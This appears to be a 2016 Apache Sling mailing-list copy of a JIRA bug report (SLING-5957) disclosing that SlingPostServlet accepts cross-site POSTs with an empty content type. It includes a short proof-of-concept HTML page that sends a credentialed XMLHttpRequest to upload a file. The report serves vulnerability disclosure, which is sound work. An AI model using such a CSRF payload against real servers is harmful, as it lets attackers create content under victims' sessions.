You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@sling.apache.org by "Dominique Jäggi (JIRA)" <ji...@apache.org> on 2016/08/12 12:11:22 UTC
[jira] [Created] (SLING-5957) SlingPostServlet: susceptible CSRF
with empty content-type
Dominique Jäggi created SLING-5957:
--------------------------------------
Summary: SlingPostServlet: susceptible CSRF with empty content-type
Key: SLING-5957
URL: https://issues.apache.org/jira/browse/SLING-5957
Project: Sling
Issue Type: Bug
Components: Servlets
Reporter: Dominique Jäggi
The _SlingPostServlet_ creates a resource from a cross-site request like so:
{code}
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost:8080/test/csrf.txt", true);
xhr.withCredentials = true;
var body = "This file has been uploaded via CSRF.=\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
{code}
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)